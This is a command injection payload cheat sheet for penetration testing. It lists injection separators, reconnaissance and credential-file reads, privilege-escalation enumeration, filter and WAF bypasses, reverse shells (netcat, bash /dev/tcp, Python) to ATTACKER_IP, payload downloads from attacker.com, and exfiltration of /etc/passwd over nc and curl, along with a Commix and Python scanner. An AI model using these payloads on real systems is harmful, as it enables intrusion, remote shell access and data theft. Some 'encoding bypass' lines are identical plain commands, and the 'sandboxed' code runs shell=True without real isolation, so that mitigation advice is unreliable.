Command Injection Payloads

Comprehensive collection of command injection payloads and bypass techniques for penetration testing.

Basic Command Injection

Simple Commands

# Basic command execution
; ls
| ls
& ls
&& ls
|| ls

# Command chaining
; ls; whoami
| ls | cat
& ls & whoami
&& ls && whoami
|| ls || whoami

Information Gathering

# System information
; uname -a
; whoami
; id
; pwd
; ls -la
; cat /etc/passwd
; cat /etc/hosts
; cat /proc/version
; cat /proc/cpuinfo
; cat /proc/meminfo

Network Information

# Network interfaces
; ifconfig
; ip addr
; ip route
; netstat -an
; ss -tuln
; arp -a
; route -n

Process Information

# Running processes
; ps aux
; ps -ef
; top
; htop
; pstree
; lsof
; fuser

Advanced Command Injection

File Operations

# File reading
; cat /etc/passwd
; head /etc/passwd
; tail /etc/passwd
; more /etc/passwd
; less /etc/passwd
; grep root /etc/passwd
; awk '{print $1}' /etc/passwd
; sed -n '1,10p' /etc/passwd

Directory Traversal

# Directory listing
; ls -la /
; ls -la /home
; ls -la /var
; ls -la /tmp
; find / -name "*.txt" 2>/dev/null
; find / -name "*.log" 2>/dev/null
; find / -name "*.conf" 2>/dev/null

User Enumeration

# User information
; cat /etc/passwd
; cut -d: -f1 /etc/passwd
; awk -F: '{print $1}' /etc/passwd
; getent passwd
; id
; whoami
; groups
; last
; w
; who

Privilege Escalation

# SUID files
; find / -perm -4000 2>/dev/null
; find / -perm -u+s 2>/dev/null
; find / -perm -2000 2>/dev/null
; find / -perm -g+s 2>/dev/null

# Sudo capabilities
; sudo -l
; sudo -V
; cat /etc/sudoers
; grep -v '^#' /etc/sudoers

Bypass Techniques

Character Filtering Bypass

# Space bypass
; cat${IFS}/etc/passwd
; cat$IFS/etc/passwd
; cat<tab>/etc/passwd
; cat<newline>/etc/passwd
; cat<carriage_return>/etc/passwd
; cat<form_feed>/etc/passwd
; cat<vertical_tab>/etc/passwd

# Quote bypass
; cat /etc/passwd
; cat "/etc/passwd"
; cat '/etc/passwd'
; cat `/etc/passwd`

Command Filtering Bypass

# Case variation
; Ls
; LS
; lS
; Ls -La
; Ls -LA

# Encoding bypass
; echo "cat /etc/passwd" | base64 | base64 -d | sh
; echo "cat /etc/passwd" | base64 | base64 -d | bash
; echo "cat /etc/passwd" | base64 | base64 -d | /bin/sh

WAF Bypass

# Comment bypass
; cat /etc/passwd #
; cat /etc/passwd /*
; cat /etc/passwd */
; cat /etc/passwd <!--

# Encoding bypass
; cat /etc/passwd
; cat /etc/passwd
; cat /etc/passwd
; cat /etc/passwd

Platform-specific Payloads

Windows

# Basic commands
; dir
; type C:\Windows\System32\drivers\etc\hosts
; whoami
; systeminfo
; ipconfig
; netstat -an
; tasklist
; wmic process list
; wmic service list
; reg query HKLM\SOFTWARE

Linux/Unix

# Basic commands
; ls
; cat /etc/passwd
; whoami
; uname -a
; ps aux
; netstat -an
; ss -tuln
; ifconfig
; ip addr
; route -n

macOS

# Basic commands
; ls
; cat /etc/passwd
; whoami
; uname -a
; ps aux
; netstat -an
; lsof -i
; ifconfig
; route -n
; system_profiler

Advanced Techniques

Reverse Shell

# Netcat reverse shell
; nc -e /bin/sh ATTACKER_IP PORT
; nc -e /bin/bash ATTACKER_IP PORT
; nc -e /bin/sh ATTACKER_IP PORT
; nc -e /bin/bash ATTACKER_IP PORT

# Bash reverse shell
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# Python reverse shell
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

File Upload

# Download file
; wget http://attacker.com/shell.php
; curl -O http://attacker.com/shell.php
; nc -l -p 1234 > shell.php
; python -c "import urllib; urllib.urlretrieve('http://attacker.com/shell.php', 'shell.php')"

Data Exfiltration

# Send data to attacker
; cat /etc/passwd | nc ATTACKER_IP PORT
; cat /etc/passwd | curl -X POST -d @- http://attacker.com/collect
; cat /etc/passwd | base64 | nc ATTACKER_IP PORT
; tar -czf - /etc/passwd | nc ATTACKER_IP PORT

Testing Tools

Commix

# Basic scan
python3 commix.py -u "http://target.com/page.php?cmd=test"

# With POST data
python3 commix.py -u "http://target.com/page.php" --data="cmd=test"

# With cookies
python3 commix.py -u "http://target.com/page.php?cmd=test" --cookie="PHPSESSID=abc123"

# OS shell
python3 commix.py -u "http://target.com/page.php?cmd=test" --os-shell

Custom Script

import requests
import re

def test_command_injection(url, param, payload):
    data = {param: payload}
    response = requests.post(url, data=data)
    
    # Check for command injection indicators
    indicators = [
        "root:",
        "bin/bash",
        "bin/sh",
        "uid=",
        "gid=",
        "groups=",
        "total",
        "drwx",
        "-rw-",
        "Directory of",
        "Volume in drive"
    ]
    
    for indicator in indicators:
        if indicator in response.text:
            print(f"Command injection detected: {payload}")
            break

# Test payloads
payloads = [
    "; ls",
    "| ls",
    "& ls",
    "&& ls",
    "|| ls",
    "; whoami",
    "| whoami",
    "& whoami",
    "&& whoami",
    "|| whoami"
]

for payload in payloads:
    test_command_injection("http://target.com/command.php", "cmd", payload)

Prevention and Mitigation

Input Validation

import re
import shlex

def validate_command(input_str):
    # Whitelist allowed characters
    allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.')
    if not set(input_str).issubset(allowed_chars):
        return False
    
    # Check for dangerous characters
    dangerous_chars = [';', '|', '&', '&&', '||', '`', '$', '(', ')', '<', '>', '\\', '"', "'"]
    for char in dangerous_chars:
        if char in input_str:
            return False
    
    return True

Command Execution

import subprocess
import shlex

def safe_command_execution(command):
    # Validate input
    if not validate_command(command):
        raise ValueError("Invalid command")
    
    # Use shlex to safely parse command
    args = shlex.split(command)
    
    # Execute command safely
    result = subprocess.run(args, capture_output=True, text=True, timeout=30)
    return result.stdout, result.stderr

Sandboxing

import subprocess
import os
import tempfile

def sandboxed_execution(command):
    # Create temporary directory
    with tempfile.TemporaryDirectory() as temp_dir:
        # Change to temporary directory
        os.chdir(temp_dir)
        
        # Execute command in sandbox
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True,
            timeout=30,
            cwd=temp_dir
        )
        
        return result.stdout, result.stderr

Testing Checklist

  • Test all input fields
  • Test with different HTTP methods
  • Test with different content types
  • Test with different command separators
  • Test with different quote types
  • Test with different encoding methods
  • Test with different bypass techniques
  • Test with different WAF bypasses
  • Test with different platform-specific commands
  • Test with different privilege escalation techniques